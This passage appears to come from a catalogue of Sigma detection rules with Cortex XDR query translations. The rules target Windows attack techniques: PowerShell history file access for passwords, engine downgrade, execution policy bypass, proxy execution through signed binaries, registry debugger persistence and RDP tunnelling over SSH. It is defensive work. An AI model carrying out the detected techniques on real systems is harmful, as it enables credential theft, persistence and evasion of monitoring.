            - ' rundll32'
            - ' mkdir '
    condition: all of selection_*
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Moderate High FP

Potential PowerShell Console History Access Attempt via History File

Detects potential access attempts to the PowerShell console history directly via history file (ConsoleHost_history.txt). This can give access to plaintext passwords used in PowerShell commands or used for general reconnaissance.

status experimental author Luc Génaux ATT&CK sub-technique id f4ff7323-b5fc-4323-8b52-6b9408e15788

cortex_xdr query

config case_sensitive = false | preset=xdr_process | filter (event_type = ENUM.PROCESS and 
 event_sub_type = ENUM.PROCESS_START) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 (action_process_image_command_line in ("*ConsoleHost_history.txt*", "*(Get-PSReadLineOption).HistorySavePath*")))

view Sigma YAML

title: Potential PowerShell Console History Access Attempt via History File
id: f4ff7323-b5fc-4323-8b52-6b9408e15788
status: experimental
description: |
    Detects potential access attempts to the PowerShell console history directly via history file (ConsoleHost_history.txt).
    This can give access to plaintext passwords used in PowerShell commands or used for general reconnaissance.
references:
    - https://0xdf.gitlab.io/2018/11/08/powershell-history-file.html
author: Luc Génaux
date: 2025-04-03
tags:
    - attack.credential-access
    - attack.t1552.001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains:
            - 'ConsoleHost_history.txt'
            - '(Get-PSReadLineOption).HistorySavePath'
    condition: selection
falsepositives:
    - Legitimate access of the console history file is possible
level: medium

Convert to SIEM query

medium Moderate Medium FP

Potential PowerShell Downgrade Attack

Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0

status test author Harish Segar (rule) ATT&CK sub-technique id b3512211-c67e-4707-bedc-66efc7848863

cortex_xdr query

config case_sensitive = false | preset=xdr_process | filter (event_type = ENUM.PROCESS and 
 event_sub_type = ENUM.PROCESS_START) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 (action_process_image_path contains "\powershell.exe" and 
 (action_process_image_command_line in ("* -version 2 *", "* -versio 2 *", "* -versi 2 *", "* -vers 2 *", "* -ver 2 *", "* -ve 2 *", "* -v 2 *"))))

view Sigma YAML

title: Potential PowerShell Downgrade Attack
id: b3512211-c67e-4707-bedc-66efc7848863
related:
    - id: 6331d09b-4785-4c13-980f-f96661356249
      type: derived
status: test
description: Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0
references:
    - http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/
    - https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#bypass-or-avoid-amsi-by-version-downgrade-
author: Harish Segar (rule)
date: 2020-03-20
modified: 2023-01-04
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\powershell.exe'
        CommandLine|contains:
            - ' -version 2 '
            - ' -versio 2 '
            - ' -versi 2 '
            - ' -vers 2 '
            - ' -ver 2 '
            - ' -ve 2 '
            - ' -v 2 '
    condition: selection
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Moderate Medium FP

Potential PowerShell Execution Policy Tampering

Detects changes to the PowerShell execution policy in order to bypass signing requirements for script execution

status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK tactic-only id fad91067-08c5-4d1a-8d8c-d96a21b37814

cortex_xdr query

config case_sensitive = false | preset=xdr_registry | filter (event_type = ENUM.REGISTRY and 
 event_sub_type = ENUM.REGISTRY_SET_VALUE) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 (((action_registry_key_name in ("*\ShellIds\Microsoft.PowerShell\ExecutionPolicy", "*\Policies\Microsoft\Windows\PowerShell\ExecutionPolicy")) and 
 ((action_registry_value_name in ("*Bypass*", "*Unrestricted*")) or 
 (action_registry_data in ("*Bypass*", "*Unrestricted*")))) and 
 (not 
 (actor_process_image_path in ("*:\Windows\System32\*", "*:\Windows\SysWOW64\*")))))

view Sigma YAML

title: Potential PowerShell Execution Policy Tampering
id: fad91067-08c5-4d1a-8d8c-d96a21b37814
related:
    - id: cf2e938e-9a3e-4fe8-a347-411642b28a9f # Registry
      type: similar
    - id: 87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180 # ProcCreation Cmdlet
      type: similar
    - id: 61d0475c-173f-4844-86f7-f3eebae1c66b # PowerShell ScriptBlock
      type: similar
status: test
description: Detects changes to the PowerShell execution policy in order to bypass signing requirements for script execution
references:
    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.3
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-01-11
modified: 2023-12-14
tags:
    - attack.defense-impairment
logsource:
    category: registry_set
    product: windows
detection:
    selection:
        TargetObject|endswith:
            # Note for future readers: For PowerShell 7+ the ExecutionPolicy is handled via a setting file due to the fact that PWSH7 is available for mac and linux
            # Attackers can create a per-user setting file (powershell.config.json) and set the execution policy there
            # Learn more here: https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_powershell_config?view=powershell-7.3
            - '\ShellIds\Microsoft.PowerShell\ExecutionPolicy'
            - '\Policies\Microsoft\Windows\PowerShell\ExecutionPolicy'
        Details|contains:
            - 'Bypass'
            - 'Unrestricted'
    filter_main_svchost:
        # Note: We filter out "svchost" to avoid FP with changes using "gpedit" for example.
        Image|contains:
            - ':\Windows\System32\'
            - ':\Windows\SysWOW64\'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Moderate High FP

Potential Process Execution Proxy Via CL_Invocation.ps1

Detects calls to "SyncInvoke" that is part of the "CL_Invocation.ps1" script to proxy execution using "System.Diagnostics.Process"

status test author Nasreddine Bencherchali (Nextron Systems), oscd.community, Natalia Shornikova ATT&CK technique id a0459f02-ac51-4c09-b511-b8c9203fc429

cortex_xdr query

config case_sensitive = false | preset=xdr_process | filter (event_type = ENUM.PROCESS and 
 event_sub_type = ENUM.PROCESS_START) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 action_process_image_command_line contains "SyncInvoke ")

view Sigma YAML

title: Potential Process Execution Proxy Via CL_Invocation.ps1
id: a0459f02-ac51-4c09-b511-b8c9203fc429
status: test
description: Detects calls to "SyncInvoke" that is part of the "CL_Invocation.ps1" script to proxy execution using "System.Diagnostics.Process"
references:
    - https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/
    - https://twitter.com/bohops/status/948061991012327424
author: Nasreddine Bencherchali (Nextron Systems), oscd.community, Natalia Shornikova
date: 2020-10-14
modified: 2023-08-17
tags:
    - attack.stealth
    - attack.t1216
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        # Note: As this function is usually called from within powershell, classical process creation even would not catch it. This will only catch inline calls via "-Command" or "-ScriptBlock" flags for example.
        CommandLine|contains: 'SyncInvoke '
    condition: selection
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Moderate High FP

Potential Provlaunch.EXE Binary Proxy Execution Abuse

Detects child processes of "provlaunch.exe" which might indicate potential abuse to proxy execution.

status test author Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel ATT&CK technique id 7f5d1c9a-3e83-48df-95a7-2b98aae6c13c

cortex_xdr query

config case_sensitive = false | preset=xdr_process | filter (event_type = ENUM.PROCESS and 
 event_sub_type = ENUM.PROCESS_START) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 (actor_process_image_path contains "\provlaunch.exe" and 
 (not 
 ((action_process_image_path in ("*\calc.exe", "*\cmd.exe", "*\cscript.exe", "*\mshta.exe", "*\notepad.exe", "*\powershell.exe", "*\pwsh.exe", "*\regsvr32.exe", "*\rundll32.exe", "*\wscript.exe")) or 
 (action_process_image_path in ("*:\PerfLogs\*", "*:\Temp\*", "*:\Users\Public\*", "*\AppData\Temp\*", "*\Windows\System32\Tasks\*", "*\Windows\Tasks\*", "*\Windows\Temp\*"))))))

view Sigma YAML

title: Potential Provlaunch.EXE Binary Proxy Execution Abuse
id: 7f5d1c9a-3e83-48df-95a7-2b98aae6c13c
related:
    - id: f9999590-1f94-4a34-a91e-951e47bedefd # CLI Abuse
      type: similar
    - id: 2a4b3e61-9d22-4e4a-b60f-6e8f0cde6f25 # CLI Registry
      type: similar
    - id: 7021255e-5db3-4946-a8b9-0ba7a4644a69 # Registry
      type: similar
status: test
description: Detects child processes of "provlaunch.exe" which might indicate potential abuse to proxy execution.
references:
    - https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/
    - https://twitter.com/0gtweet/status/1674399582162153472
author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel
date: 2023-08-08
tags:
    - attack.stealth
    - attack.t1218
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\provlaunch.exe'
    filter_main_covered_children:
        # Note: this filter is here to avoid duplicate alerting by f9999590-1f94-4a34-a91e-951e47bedefd
        - Image|endswith:
              - '\calc.exe'
              - '\cmd.exe'
              - '\cscript.exe'
              - '\mshta.exe'
              - '\notepad.exe'
              - '\powershell.exe'
              - '\pwsh.exe'
              - '\regsvr32.exe'
              - '\rundll32.exe'
              - '\wscript.exe'
        - Image|contains:
              - ':\PerfLogs\'
              - ':\Temp\'
              - ':\Users\Public\'
              - '\AppData\Temp\'
              - '\Windows\System32\Tasks\'
              - '\Windows\Tasks\'
              - '\Windows\Temp\'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Moderate Medium FP

Potential Registry Persistence Attempt Via DbgManagedDebugger

Detects the addition of the "Debugger" value to the "DbgManagedDebugger" key in order to achieve persistence. Which will get invoked when an application crashes

status test author frack113 ATT&CK technique id 9827ae57-3802-418f-994b-d5ecf5cd974b

cortex_xdr query

config case_sensitive = false | preset=xdr_registry | filter (event_type = ENUM.REGISTRY and 
 event_sub_type = ENUM.REGISTRY_SET_VALUE) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 (action_registry_key_name contains "\Microsoft\.NETFramework\DbgManagedDebugger" and 
 (not 
 (action_registry_value_name = "\"C:\Windows\system32\vsjitdebugger.exe\" PID %d APPDOM %d EXTEXT \"%s\" EVTHDL %d" or 
 action_registry_data = "\"C:\Windows\system32\vsjitdebugger.exe\" PID %d APPDOM %d EXTEXT \"%s\" EVTHDL %d"))))

view Sigma YAML

title: Potential Registry Persistence Attempt Via DbgManagedDebugger
id: 9827ae57-3802-418f-994b-d5ecf5cd974b
status: test
description: Detects the addition of the "Debugger" value to the "DbgManagedDebugger" key in order to achieve persistence. Which will get invoked when an application crashes
references:
    - https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/
    - https://github.com/last-byte/PersistenceSniper
author: frack113
date: 2022-08-07
modified: 2023-08-17
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.execution
    - attack.stealth
    - attack.t1574
logsource:
    category: registry_set
    product: windows
detection:
    selection:
        TargetObject|endswith: '\Microsoft\.NETFramework\DbgManagedDebugger'
    filter:
        Details: '"C:\Windows\system32\vsjitdebugger.exe" PID %d APPDOM %d EXTEXT "%s" EVTHDL %d'
    condition: selection and not filter
falsepositives:
    - Legitimate use of the key to setup a debugger. Which is often the case on developers machines
level: medium

Convert to SIEM query

medium Strong Medium FP

Potential Regsvr32 Commandline Flag Anomaly

Detects a potential command line flag anomaly related to "regsvr32" in which the "/i" flag is used without the "/n" which should be uncommon.

status test author Florian Roth (Nextron Systems) ATT&CK sub-technique id b236190c-1c61-41e9-84b3-3fe03f6d76b0

cortex_xdr query

config case_sensitive = false | preset=xdr_process | filter (event_type = ENUM.PROCESS and 
 event_sub_type = ENUM.PROCESS_START) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 ((action_process_image_path contains "\regsvr32.exe" and 
 (action_process_image_command_line contains " -i:" or 
 action_process_image_command_line contains " /i:" or 
 action_process_image_command_line contains " –i:" or 
 action_process_image_command_line contains " —i:" or 
 action_process_image_command_line contains " ―i:")) and 
 (not 
 action_process_image_command_line contains " -n " or 
 action_process_image_command_line contains " /n " or 
 action_process_image_command_line contains " –n " or 
 action_process_image_command_line contains " —n " or 
 action_process_image_command_line contains " ―n ")))

view Sigma YAML

title: Potential Regsvr32 Commandline Flag Anomaly
id: b236190c-1c61-41e9-84b3-3fe03f6d76b0
status: test
description: Detects a potential command line flag anomaly related to "regsvr32" in which the "/i" flag is used without the "/n" which should be uncommon.
references:
    - https://twitter.com/sbousseaden/status/1282441816986484737?s=12
author: Florian Roth (Nextron Systems)
date: 2019-07-13
modified: 2024-03-13
tags:
    - attack.stealth
    - attack.t1218.010
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\regsvr32.exe'
        CommandLine|contains|windash: ' -i:'
    filter_main_flag:
        CommandLine|contains|windash: ' -n '
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Administrator typo might cause some false positives
level: medium

Convert to SIEM query

medium Moderate High FP

Potential Remote Desktop Tunneling

Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination.

status test author Tim Rauch, Elastic (idea) ATT&CK technique id 8a3038e8-9c9d-46f8-b184-66234a160f6f

cortex_xdr query

config case_sensitive = false | preset=xdr_process | filter (event_type = ENUM.PROCESS and 
 event_sub_type = ENUM.PROCESS_START) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 (action_process_image_command_line contains ":3389" and 
 (action_process_image_command_line in ("* -L *", "* -P *", "* -R *", "* -pw *", "* -ssh *"))))

view Sigma YAML

title: Potential Remote Desktop Tunneling
id: 8a3038e8-9c9d-46f8-b184-66234a160f6f
status: test
description: Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination.
references:
    - https://www.elastic.co/guide/en/security/current/potential-remote-desktop-tunneling-detected.html
author: Tim Rauch, Elastic (idea)
date: 2022-09-27
tags:
    - attack.lateral-movement
    - attack.t1021
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains: ':3389' # RDP port and usual SSH tunneling related switches in command line
    selection_opt:
        CommandLine|contains:
            - ' -L '
            - ' -P '
            - ' -R '
            - ' -pw '
            - ' -ssh '
    condition: all of selection*
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

Palo Alto Cortex XDR

Detection rules